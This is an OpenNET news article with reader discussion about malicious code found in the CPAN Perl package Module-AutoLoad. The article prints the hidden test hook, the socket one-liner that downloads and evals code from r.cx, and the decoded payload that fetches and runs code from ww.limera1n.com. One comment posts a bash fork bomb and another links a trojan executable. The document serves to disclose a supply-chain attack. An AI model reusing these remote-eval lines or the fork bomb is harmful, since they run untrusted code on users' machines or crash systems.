The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

В Perl-пакете Module-AutoLoad выявлен вредоносный код

29.07.2020 11:27

В распространяемом через каталог CPAN Perl-пакете Module-AutoLoad, предназначенном для автоматической загрузки CPAN-модулей на лету, выявлен вредоносный код. Вредоносная вставка была найдена в коде теста 05_rcx.t, который поставляется с 2011 года. Примечательно, что вопросы о загрузке сомнительного кода возникали на Stackoverflow ещё в 2016 году.

Вредоносная активность сводится к попытке загрузки и выполнения кода со стороннего сервера (http://r.cx:1/) в процессе выполнения тестового набора, запускаемого при установке модуля. Предполагается, что изначально загружаемый с внешнего сервера код не был вредоносным, но теперь запрос перенаправляется на домен ww.limera1n.com, отдающий свою порцию кода для выполнения.

Для организации загрузки в файле 05_rcx.t используется следующий код:


   my $prog = __FILE__;
   $prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
   my $try = `$^X $prog`;

Указанный код приводит к выполнению скрипта ../contrib/RCX.pl, содержимое которого сводится к строке:


   use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};

Данный скрипт загружает запутанный при помощи сервиса perlobfuscator.com код с внешнего хоста r.cx (коды символов 82.46.99.88 соответствуют тексту "R.cX") и выполняет его в блоке eval.


   $ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1"; print <$b>;'
   eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE....}

После распаковки в итоге выполняется следующий код:


   print{$b=new IO::Socket::INET"ww.limera1n.com:80"}"GET /iJailBreak
";eval<$b>or return warn$@while$b;1

В настоящее время проблемный пакет удалён из хранилища PAUSE (Perl Authors Upload Server), а учётная запись автора модуля заблокирована. При этом модуль пока остаётся доступен в архиве MetaCPAN и может быть напрямую установлен с MetaCPAN при помощи некоторых утилит, таких как cpanminus. Отмечается, что пакет не был широко распространён.

Интересно, что к обсуждению подключился и автор модуля, который опроверг информацию о том, что вредоносный код подставлен после взлома его сайта "r.cx" и пояснил, что он просто так развлекался, а perlobfuscator.com использовал не для скрытия чего-то, а для сокращения размера кода и упрощения его копирования через буфер обмена. Выбор названия функции "botstrap" пояснён тем, что это слово "звучит как bot и короче, чем bootstrap". Автор модуля также заверил, что выявленные манипуляции не совершают вредоносных действий, а лишь демонстрируют загрузку и выполнение кода по TCP.

  1. Главная ссылка к новости (https://news.perlfoundation.or...)
  2. OpenNews: В RubyGems выявлено 724 вредоносных пакета
  3. OpenNews: В каталоге Python-пакетов PyPI выявлены две вредоносные библиотеки
  4. OpenNews: В репозитории NPM выявлен вредоносный пакет bb-builder. Выпуск NPM 6.11
  5. OpenNews: В зависимостях к npm-пакету с установщиком PureScript выявлены вредоносные изменения
  6. OpenNews: В каталоге PyPI выявлены вредоносные пакеты
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/53448-perl
Ключевые слова: perl, cpan, malware
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (86) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 11:49, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –15 +/
    cpan это зло
     
     
  • 2.26, бублички (?), 14:13, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +12 +/
    ты побежишь выбрасывать все ножи когда узнаешь сколько людей от них погибает ежегодно в одном только твоём Барнауле
     
     
  • 3.31, Аноним (31), 14:42, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • –4 +/
    В ауле Барна?
     
  • 3.36, . (?), 15:21, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Вот же ж м-к. Бежать-то из того Барнаула надо было!

     
  • 2.27, Аноним (27), 14:30, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    npm - добро!
     
     
  • 3.49, Аноним (49), 16:51, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    war is peace
     
  • 2.67, Онаним (?), 22:00, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    cpan, npm, composer и прочие извращения
    А вообще зло - те, кто не ревьюит разнородный хлам, который тянется в проект.
     

  • 1.2, lurkr (ok), 11:57, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +20 +/
    >> Данный скрипт загружает запутанный при помощи сервиса perlobfuscator.com код

    перлу это не требуется, можно было оставить все как есть )))

     
     
  • 2.4, user90 (?), 12:00, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +12 +/
    Ну как тебе сказать.. если попросить какого-нибудь петон-нуба, то у него именно так и выйдет.
     

  • 1.3, user90 (?), 11:58, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Как-то ниачем: когда именно была сделана? С какого аккаунта? Шерлоки млин)
     
     
  • 2.5, ss (??), 12:00, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Там же сказано- автор впендюрил это туда для развлечения. шутка.
     
     
  • 3.6, user90 (?), 12:08, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Читал по диагонали :)
     
     
  • 4.23, Q2W (?), 14:00, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Ну ты и Лестрейд, блин.
     
  • 3.32, Аноним (32), 14:45, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +4 +/
    > Там же сказано- автор впендюрил это туда для развлечения. шутка.

    Ну да. Выглядит как "он упал на мой пистолет и из-за чего произошло 4 выстрела в грудную клетку и один раз в затылок".

     

  • 1.7, имя_ (?), 12:25, 29/07/2020 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
  • +1 +/
     

  • 1.8, Аноним (9), 12:28, 29/07/2020 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
  • –6 +/
     
  • 1.10, mos87 (ok), 12:34, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    что лишний раз показывает, неважно какой язык - люди всегда одинаковые.
     
  • 1.11, mos87 (ok), 12:37, 29/07/2020 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
  • –1 +/
     
  • 1.12, mos87 (ok), 12:46, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    собсно в том треде от 2016 на SO почти всё сказано.
    в т.ч. очевидная мыслЯ, что такую фигню использовать очень-очень айайай.

    так что ССЗБ

     
     
  • 2.17, Аноним (17), 13:18, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Расту и ноде значит норм, а тут ай ай ай? Получаются, у перл разрабов культура напрочь отсутствует, раз они способны такое провернуть.
     
     
  • 3.19, mos87 (ok), 13:21, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    шта? ты либо нихера не понял либо напейсал херню, но вероятнее и то и другое
     
     
  • 4.21, Аноним (17), 13:26, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Т.е. версии, что это ты тупорез, ты принципиально не рассматриваешь?
     

  • 1.13, Аноним (13), 12:48, 29/07/2020 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
  • +/
     
  • 1.14, mos87 (ok), 12:56, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    perl -e "print 82.46.99.88" хехе.

    18:38:44 < veesh> i just noticed now that the OP on the SO question was
    asking how to port the code to python
    18:39:00 < veesh> i'm glad that all those people left perl 20 years ago

    ))

     
  • 1.15, mos87 (ok), 12:58, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –4 +/
    >Автор модуля также заверил, что выявленные манипуляции не совершают вредоносных действий, а лишь демонстрируют

    что вся эта модная фигня хипсто- и макако- (на выбор) язычков не есть ничто новое. Но Perl жЫ УсТАрЕл!!111

    ЗЫ более того, афтор сего творения подтралил в конце своего поста - "And I honestly don't know if Python is powerful enough to do anything like this"

     
     
  • 2.91, Убить_Криса (?), 10:07, 01/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    бп. Точно так же можно написать свой лоадер модулей и при import some грузить че-угодно откуда угодно
     

  • 1.16, yet another anonymous (?), 13:15, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Так дело не в языке. А в "автоподтягивании".
     
     
  • 2.25, mos87 (ok), 14:12, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    я об этом выше и постил
     
     
  • 3.38, anonymous yet another (?), 15:35, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Вызывает интерес ваш технический прогресс: как у вас там ...

    К вопросу о подтягивании источников в процессе сборки:
    node.js, busybox, buildroot, cargo (rust).  Другим так наисвежайшие .po при сборке подтянуть всенепременнейше необходимо.

     
     
  • 4.41, mos87 (ok), 15:57, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • –2 +/
    любой калькулятор обязан тащить за собой ОС
    желательно, не одну.

    ЗЫ *антерес

     

  • 1.20, Sw00p aka Jerom (?), 13:23, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Название модуля само за себя говорит, чему тут удивляться, автор решил ещё потестить загрузку через сеть :)
     
     
  • 2.42, mos87 (ok), 16:00, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    собсно автор это и расписал на СО
    а всякие упоминания ботов и джейлов говорит добавил по приколу

    вообще забавно, стандартная фича всех модно-проЭктов же
    без которых хипстодевы жить уже не могут)

     
  • 2.83, YetAnotherOnanym (ok), 12:39, 30/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > автор решил ещё потестить загрузку через сеть

    Больше похоже на то, что автор решил потестить умственные способности своих коллег.

     

  • 1.22, Аноним (22), 13:58, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Всё правильно сделал. Нужно ещё было удаление всех доступных на запись файлов добавить. Ибо экосистемы пакетов и сложившиеся практики разработки ПО - это очень удобно для бэкдорщиков. Создаёшь полезный пакет, в него пихаешь зависимость от другого контролируемого собой (возможно под другим именем), рядом - ещё десяток, в свой - так же, и так пока не решишь, что пора вставить бэкдор. Никто и не найдёт - нет никому охоты в зависимостях копаться.
     
     
  • 2.28, Аноним (28), 14:30, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Ибо экосистемы пакетов и сложившиеся практики разработки ПО - это очень удобно для бэкдорщиков.

    Так можно сказать про что угодно.

     
  • 2.29, Аноним (29), 14:36, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Других-то вариантов все равно нет.
     

  • 1.24, бублички (?), 14:07, 29/07/2020 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
  • +5 +/
     

     ....ответы скрыты (2)

  • 1.30, Анонолекс (?), 14:38, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Люблю перл, но не люблю выёжибающихся брайнфакеров. С баш такого нет. Но у баш и cpan нет, так что переживать тоже нечего...
     
     
  • 2.86, PnD (??), 14:10, 30/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Ну конечно.
    :(){ :|:& };:
     
     
  • 3.89, Тот самый Ne01eX (?), 05:07, 31/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    А вот матом ругаться было не обязательно... :-)
     

  • 1.33, Аноним (31), 14:45, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    >Вредоносная вставка была найдена в коде теста 05_rcx.t, который поставляется с 2011 года. Примечательно, что вопросы о загрузке сомнительного кода возникали на Stackoverflow ещё в 2016 году.

    Жить 9 лет с дырой. Поздравляю!

     
     
  • 2.39, Аноним (39), 15:36, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Ровно столько сколько пыль с перла не стряхивали.
     

  • 1.34, Аноним (34), 14:51, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –4 +/
    Вот это новость. Вообще-то, в любом perl пакете есть вредоносный код.
     
     
  • 2.40, Аноним (39), 15:36, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Только про это никто уже не узнает.
     
  • 2.43, mos87 (ok), 16:00, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    да. потому что они дело делают.
    некоторым это вредно - как аллергия на всякого рода труд.
     

  • 1.35, Аноним (35), 14:52, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А тесты они в каких ситуациях запускаются? Нужно было самому ручками их запускать?
     
     
  • 2.37, . (?), 15:23, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    CPAN.pm запустит. У них, вишь ли, не принято устанавливать модуль не выполнив тесты.
     

  • 1.44, Аноним (44), 16:09, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    И да восславим же святой опенсорс, где миллионы глаз неустанно бдят за отсутствием закладок в коде!
     
     
  • 2.45, mos87 (ok), 16:13, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    а мильярды жырных анонов толсто недотралят
     
  • 2.65, НяшМяш (ok), 21:01, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • –3 +/
    > миллионы глаз
    > Perl

    забавно

     

  • 1.46, Аноним (46), 16:22, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Свежая статья по теме:

    Backstabber’s Knife Collection: A Review of Open Source Software Supply Chain Attacks

    https://arxiv.org/pdf/2005.09535.pdf

    "This paper presents a dataset of 174 malicious software packages that were used in real-world attacks on open source software supply chains,and which were distributed via the popular package repositories npm, PyPI,  and  RubyGems."

     
  • 1.47, Аноним (47), 16:38, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    У кого в iptables/nftables разрешёно обращение к внешним адресам по порту 1?
     
     
  • 2.63, Аноним (63), 20:21, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Почти у всех. Мало кто исходящие соединения вообще контролирует. Если запрещать всё по умолчанию, то рано или поздно проклянешь себя за это. Ибо в современных системах невозможно знать всё о том, что куда, зачем и почему.
     
     
  • 3.64, Аноним (64), 20:28, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Потому что пакетного файервола мало, нужен ещё файервол приложений.
     
     
  • 4.68, _ (??), 22:12, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Ну у вас в форточке - есть. И что помогло оно вам ? :-D
     
  • 4.69, Карабьян (?), 22:32, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Посоветуйте норм сабж кроме ufw
     
     
  • 5.74, . (?), 00:28, 30/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    ufw файрволом приложений не является. Обычная поделка л@п4@атых поверх пакетного фильтра для альтернативно-т4пых, неспособных настроить iptables.

    Файрволами приложений являются коробочки paloalto networks, checkpoint ngfw, cisco firepower и им подобные. К сожалению, ценник вас не порадует.

     
     
  • 6.76, Карабьян (?), 00:45, 30/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > ufw файрволом приложений не является. Обычная поделка л@п4@атых поверх пакетного фильтра
    > для альтернативно-т4пых, неспособных настроить iptables.
    > Файрволами приложений являются коробочки paloalto networks, checkpoint ngfw, cisco firepower
    > и им подобные. К сожалению, ценник вас не порадует.

    Благодарю. А как они добились того, что иптейблз фильтрует трафик отдельных приложений? Я, увы, в нем умею настраивать фильтровацию только отдельных пользователей/групп, был бы признателен за подсказку

     

  • 1.50, Аноним (50), 16:56, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Там по адресу "ww.limera1n.com" - сайт -
    http://www.limera1n.com/
    http://www.limera1n.com/limera1n.exe
    Virustotal https://www.virustotal.com/gui/file/df66bbf8308d20adb056b63994272bf5b0656d54e8
    пишет -  "Trojan.GenericKD.Win32.245152" и т.п.
     
  • 1.51, ann (??), 17:44, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Вот она сила этих всяких автоматически подгружаемых модулей и библиотек. Которую так любят неосиляторы пакетых менеджеров операционной системы.

    Во все языки уже пихают эти менеджеры, питон, раст, теперь и в перл. Наделюсь до нормальных языков эта болезнь не дойдёт.

     
     
  • 2.56, анонн. (?), 18:04, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Вот она сила этих всяких автоматически подгружаемых модулей и библиотек. Которую так любят неосиляторы пакетых менеджеров операционной системы.
    > Во все языки уже пихают эти менеджеры, питон, раст, теперь и в перл.
    > теперь и в перл
    > уже пихают
    >> CPAN: 1993-95 год

    https://www.ctan.org/ctan
    >> CTAN was built in 1992, by Rainer Schoepf and Joachim Schrod in Germany, Sebastian Rahtz in the UK, and George Greenwade in the US

    Вот она сила этих всяких то ли маклаудов-осиляторов, то ли тех, кто сначала опоздал родиться, затем не захотел разбираться, но имел ценное мнение ...

     
     
  • 3.59, ann (??), 18:21, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Ты сам ответил 1992-ой. Тогда люди дело делали и задачи решали в большинстве своём (конечно всякие ... всегда были и будут). А сейчас в большинстве своём пихают трояны и рекламу. В этом и разница. Тогда это делали инженеры, сейчас обезьянки и эта идея - дырище.

    Перл ещё и за свою специфику долго не имел с этим проблем. Не каждый ослит, а обезьянки и подавно.

     
  • 2.75, . (?), 00:38, 30/07/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Которую так любят неосиляторы пакетых менеджеров операционной системы.

    в случае с перлом претензии к неосиляторству следует предъявлять таки авторам пакетных менеджеров. Вполне очевидно, почему не надо пихать весь CPAN в пакеты - они никогда и никому не понадобятся, а через неделю половина устареет.

    Возможно, если бы они не были ниасиляторами, бросившими свои поделки еще в 90е - мы бы и не увидели всю эту мерзость, качающую пол-интернета в хомяк.
    Ибо как раз у CPAN.pm есть механизм интеграции с системным пакетным менеджером, позволяющий установленные им пакеты отдать под его управление, чтобы их было в нем видно, чтобы можно было потом удалить, правильно обработав зависимости. И ни одна скотина, кроме разработчиков freebsd, этот механизм использовать не осилила.

    Поэтому авторы всяких пихонов с хрустами уже и не парились.

     
  • 2.84, Вы забыли заполнить поле Name (?), 12:40, 30/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > Которую так любят неосиляторы пакетых менеджеров операционной системы.

    Дык это не работает. Вот есть у тебя модуль на питоне и ты будешь собирать пакеты для всех дистритбутивов что ли?

     

  • 1.52, Повидло19 (?), 17:53, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > коды символов 82.46.99.88 соответствуют тексту "R.cX"

    Мне кажется, это не просто коды символов, а адрес IP. Динамит меня раздери!

     
  • 1.53, Повидло19 (?), 17:55, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Запомните дети, тесты не должны лезть в сеть.
     
     
  • 2.57, ann (??), 18:17, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    А когда код с сетью и связан?
     
     
  • 3.58, Повидло19 (?), 18:18, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Солнышко, это должна быть отдельные тесты, уже системные или интеграционные.
     
     
  • 4.60, ann (??), 18:23, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Да, верно, и в идеале внутри изолированной сети. Но тем не менее это тесты. Тестировать в сети можно много всего, реализацию сетевых протоколов любого уровня, нагрузку и т.д.

    У меня много тестов в сети гоняют протокол прикладного уровня, но сеть да, изолированна.

     
  • 3.71, бублички (?), 23:17, 29/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    несколько лет писал на Perl. что из тестов невозможно воспроизвести на localhost и по какой причине? поиск котиков/порнухи в Google?
     
  • 2.79, cheater (?), 10:24, 30/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > Запомните дети, тесты не должны лезть в сеть.

    По-твоему в этом состоит проблема, вскрытая автором? Ну замени слова "скрипт загружает пейлоад по сети" на "скрипт удаляет ~", сильно тебе поможет что скрипт не лезет в сеть?

     

  • 1.61, Онаним (?), 18:44, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Ахах блджад, очередной авторепозипопоторий поимели.
    Сколько раз говорилось уже...
     
  • 1.62, Аноним (62), 19:56, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Согласен, cpan - это очень мутная тема
     
  • 1.66, Аноним (66), 21:28, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    Это СПО? да
    Автор просто развлекался? да
    Тогда все нормально
     
  • 1.72, Аноним (72), 23:38, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    >вредоносный код подставлен после взлома его сайта "r.cx" и пояснил, что он просто так развлекался

    Целевая атака. Цели отдаётся боевое, остальным - безобидное.

    Его следует засудить за такое. Со стороны пользователей - за НСД и вредоносное ПО. Со стороны geohotа - за DDoS-атаку.

     
  • 1.77, Аноним (77), 00:54, 30/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    С одной стороны шалости молодости понять можно, а с другой стороны это либо сделано целенаправлено, либо автор еще не вырос из пеленок. Поэтому считаю правильным то, что модуль заблокировали. За 9 лет можно было избавиться от этой порнографии.
     
  • 1.80, cheater (?), 10:25, 30/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    С волчьим билетом из CPAN. Для развлечений есть локалхост.
     
     
  • 2.81, Аноним (81), 11:43, 30/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    >Интересно, что к обсуждению подключился и автор модуля

    Вот автора модуля, надо с волчьим билетом.

     

  • 1.85, YetAnotherOnanym (ok), 12:51, 30/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    В этом отношении мне нравится rebar - можно отревизить зависимость и прибить гвоздями ту её версию, в которой ты уверен. И пусть там кто угодно что угодно в новые версии пихает - будет установлена доверенная версия или будет ошибка.
     
     
  • 2.87, Аноним (22), 14:12, 30/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Ну отлично Поставишь изначально бекдорнутую версию, а обновление, выпиливающее ... большой текст свёрнут, показать
     
     
  • 3.90, benu (ok), 16:33, 31/07/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Весь мир держится на доверии. Ты доверяешь повару в ближайшей кафешке, он доверяет автослесарю, который чинит его тачку и т.д.
    Сколько ещё проживёт наш мир?
     
     
  • 4.96, banya39 (ok), 11:21, 10/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > Весь мир держится на доверии. Ты доверяешь повару в ближайшей кафешке, он
    > доверяет автослесарю, который чинит его тачку и т.д.
    > Сколько ещё проживёт наш мир?

    Долго

     

  • 1.95, Аноним (95), 08:51, 07/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ну, не прикол, конечно, а ботнет:

    http://www.r.cx/faq.html

    A: RCX means Remote Code eXecution, the framework used by PerlObfuscator.Com

    Ответ: платформе rcx означает удаленное выполнение кода, в рамках используемого PerlObfuscator.Com

     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру